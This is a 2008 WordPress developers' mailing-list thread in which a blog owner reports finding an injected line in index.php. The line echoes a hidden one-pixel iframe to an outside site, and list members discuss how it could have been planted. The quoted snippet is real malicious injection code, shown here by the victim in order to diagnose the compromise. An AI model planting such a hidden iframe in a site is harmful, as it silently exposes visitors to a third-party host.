[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 17:59:37 GMT 2008


Me and only one friend have access to the server.

On Mon, Dec 22, 2008 at 7:33 PM, Joost de Valk <joost at yoast.com> wrote:
> If the file is writable for the webserver and file access is enabled on the
> webserver: yes.
>
> Joost de Valk
>
> joost at yoast.com
>
> http://yoast.com/
> http://twitter.com/jdevalk
>
> Sent from my iPhone
>
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>
>> Wow. That's nasty, and malicious. Could a plugin do that?
>>
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>
>>> Hello,
>>>
>>> For some reason i found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>
>>> I tried looking at the logs. No luck. The file's permisions look like
>>> this:
>>>
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
>>>
>>> I'm still trying to figure out how that line got there. I've
>>> downloaded wordpress right from wordpress.org, and the server is a
>>> dedicated one, only two users with shell access to it.
>>>
>>> Any suggestions ?
>>>
>>> --
>>> Regards,
>>> madalin
>>> http://madalin.eu
>>> http://www.tg-jiu.ro
>>> http://www.radioomega.ro
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list